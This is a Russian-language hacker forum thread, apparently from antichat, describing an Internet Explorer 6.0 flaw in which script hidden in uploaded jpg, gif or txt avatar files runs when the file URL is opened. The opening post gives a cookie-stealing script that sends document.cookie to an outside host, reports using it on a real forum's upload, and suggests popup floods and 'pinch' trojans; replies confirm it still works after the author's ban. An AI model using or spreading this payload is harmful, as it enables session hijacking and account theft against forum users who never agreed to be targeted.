![]() |
Уязвимость в IE 6.0 при обработке файлов jpg, gif, txt.
Привет, вы когда-нибудь слышали об уязвимостях jpg или gif?
Да!- скажите вы. Но об уязвимости при обработке в txt вы и не мечтали. Тогда эта статья для вас. Недавно загорелся идеей вставить свой скрипт в форум (Invision Power Board (U) v1.3 Final), через аватар (многие об этом мечтали =) ). Долго я бился с форумом и все впустую, форум так просто не сдавался! Немного поразмыслив я решил попробовать создать файл со скриптом <script>alert("Hacked")</script> и сохранить в jpg. При загрузке изображения в аватар на форуме ничего из того что я ожидал не произошло =( . Тогда я решил посмотреть на свою картинку (аватар) напрямую, через URL: открыл контекстное меню => свойства=> получил адрес картинки на форуме, т.е. в той области форума в которую она загружалась http://www.emu-land.net/forum/uploads/av-552.gif И что бы вы думали? О-ля-ля, вот сюрприз - скрипт сработал =) Я попробовал этот фокус с gif - скрипт тоже работал. Как я понял позже, IE при загрузке картинки на сайт через тег <img> не обрабатывает ее, если в ней есть скрипт, воспринимает как ошибку, т.к. IE ожидает изображение! Но при загрузке напрямую в URL, IE ориентируется на синтаксис и => скрипт работает =) Ну и что, что работает, что особенного это нам дает ? А вот что! Как часто вы переходите по ссылкам в форуме, особенно если они имеют вид http://hacker.narod.ru ? Вот и я, честно говоря не особенно доверяю, но а как часто вы переходите из топика в топик на форуме? То та =) Адрес картинки ,а в ней может быть что угодно, будет иметь локальный адрес т.е. если адрес форума www.site.ru/forum , то адрес картинки будет www.site.ru/forum/uploads/gif.jpg (в разных форумах по-разному!). Все что вам остается это дать эту ссылку кому-нибудь на форуме, представим что в картинке такой скрипт <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> или другой любой сниффер вы получаете в свое пользование cookie почти любого пользователя. Да и вообще используя эту технолоию, а как оказалось скрипты срабатывают даже в txt, можно под видом безобидного файла (txt, gif, jpg(jpeg)) запустить скрипт: 1) бесконечные окна http://foranti.narod.ru/zlieokna.jpg (будьте осторожны) 2) Использовать pinch (см. видео античат) 3)Похищение cookie 4) Ваше воображение вам подскажет =) Данная уязвимость была протестирована на Firefox 1.0, на что он злобно выругался:"Изображение “http://foranti.narod.ru/1.jpg” не может быть показано, так как содержит ошибки." Opera 8.0 , тож... не работает =( Но учитывая тот факт что от 60-90% пользователей сидят под IE можно смело идти в бой =) Так что с милой улыбкой на лице передадим Билли привет =) Microsoft как всегда на высоте =) Вот еще примеры: http://foranti.narod.ru/1.txt http://foranti.narod.ru/1.gif http://foranti.narod.ru/1.jpg Хочу поблагодарить White Jordan, ведь именно он подталкнул меня на то, чтоб еще раз покапаться с аватарой! =))) |
Народ эту ссылку(http://www.emu-land.net/forum/uploads/av-552.gif) нужно напрямую в Браузере вводить, иначе вас редиректят на главную страницу сайта!
|
Внутри форума ссылка раБотает нормально!
|
http://www.emu-land.net/forum/index....topic=1670&hl=
вот смотрите =) |
Ссылка является битой или удалённой...
А вообще мысль интересная.. с аватаром). |
Народ на emu-land Больше ссылка не раБотает!!! =)))
Меня заБанили =))) Хотя если на прямую заходить http://www.emu-land.net/forum/uploads/av-552.gif, то скрипт еще раБотает!!! |
слушай, ты свел скрипт с картинкой пользуясь прогой какой, или аватара на форуме загружает аватару с внешнего сайта?
|
Да аватара грузит ее на сайт!
|
=) Весело.....
Куда уплыли куки??? Ааа.. Куда они ушли??? И где найти им место... Что внось они нужны =) гг |
Есть класс куки "ОБычные", а есть класс куки "Водоплавающие"!
Здесь описан класс "Водоплавающих" кук =))) |
| Время: 14:53 |